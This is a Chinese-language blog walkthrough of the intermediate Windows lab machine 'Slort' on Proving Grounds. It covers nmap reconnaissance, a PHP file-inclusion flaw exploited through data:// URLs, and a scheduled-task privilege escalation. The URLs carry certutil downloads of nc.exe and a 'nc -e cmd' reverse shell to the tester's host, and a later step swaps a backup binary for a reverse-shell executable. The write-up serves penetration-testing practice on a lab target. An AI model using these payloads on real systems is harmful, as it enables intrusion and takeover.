Slort pg walkthrough Intermediate window

nmap 
┌──(root㉿kali)-[~]
└─# nmap -p- -A -sS 192.168.226.53
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 04:30 UTC
Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 40.00% done; ETC: 04:32 (0:00:15 remaining)
Nmap scan report for 192.168.226.53
Host is up (0.071s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host '192.168.45.250' is not allowed to connect to this MariaDB server
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.226.53:4443/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.226.53:8080/dashboard/
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=12/20%Time=6764F33A%P=x86_64-pc-linux-gnu%
SF:r(NULL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.250'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/20%OT=21%CT=1%CU=32487%PV=Y%DS=4%DC=T%G=Y%TM=676
OS:4F3F4%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=106%TI=I%CI=I%TS=U)SEQ(
OS:SP=104%GCD=1%ISR=107%TI=I%CI=I%TS=U)OPS(O1=M578NW8NNS%O2=M578NW8NNS%O3=M
OS:578NW8%O4=M578NW8NNS%O5=M578NW8NNS%O6=M578NNS)WIN(W1=FFFF%W2=FFFF%W3=FFF
OS:F%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M578NW8NNS%CC=N%Q=)
OS:T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=80%W=
OS:0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T
OS:6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=80%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)

Network Distance: 4 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-12-20T04:34:47
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   69.88 ms 192.168.45.1
2   69.72 ms 192.168.45.254
3   70.26 ms 192.168.251.1
4   71.01 ms 192.168.226.53

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 247.05 seconds
ftp尝试匿名登录 登录不了

image
namp扫到ftp暴露版本号看看能不能找到exp
发现了一个exp 但似乎是本地提权用的
https://github.com/NeoTheCapt/FilezillaExploit/blob/master/README.md

对smb进行探测
image
发现页没啥

3306 端口尝试无密码连接 发现也不行
image

将目光投向4443和8080 端口 发现连个端口搭建的站点一样
image

image
用dirsearch 浅浅扫一下 看看有啥东西
image
发现了个phpinfo页面
我们使用users关键字 定位 发现了一个window靶机上存在的用户

image

还发现了一个站点site 访问这个路径看看是啥吧
image
image

其实看到他的跳转到的路径 我们就应该很敏感的想到 是否会有文件包含漏洞 我直接用data伪协议试了试发现确实存在文件包含
http://192.168.226.53:4443/site/index.php?page=data://text/plainy,%3C?php%20echo%20111?%3E
image
尝试反弹shell
http://192.168.226.53:4443/site/index.php?page=data://text/plainy,%3C?php%20system(%22certutil%20-urlcache%20-split%20-f%20http://192.168.45.250:8080/nc.exe%20%20nc.exe%22)?%3E

http://192.168.226.53:4443/site/index.php?page=data://text/plainy,%3C?php%20system(%22nc%20-e%20cmd%20192.168.45.250%2080%22)?%3E
反弹shell成功
image

接下来进入提权环节
我们会想起之前我们看到的关于ftp的本地提权exp 我们试试能不能执行 进行提权
image
好像不太行

只能看看其他突破口了

我们发现在c盘下有个backup目录
里面有个info.txt 文件 查看一下
image
意思是说他每五分钟运行一次 backup下的tftp.exe 文件

这样我想到了定时任务提权
如果我们对该目录有课写权限的话就可以替换该文件执行反弹shell提权了
certutil -urlcache -split -f http://192.168.45.250:8081/shell_reverse.exe shell_reverse.exe下载下来我们的反弹shell文件
move TFTP.EXE A.EXE
move shell_reverse.exe TFTP.EXE
等待执行 提权成功
image

posted @ 2024-12-20 14:44  WSssSW  阅读(0)  评论(0编辑  收藏  举报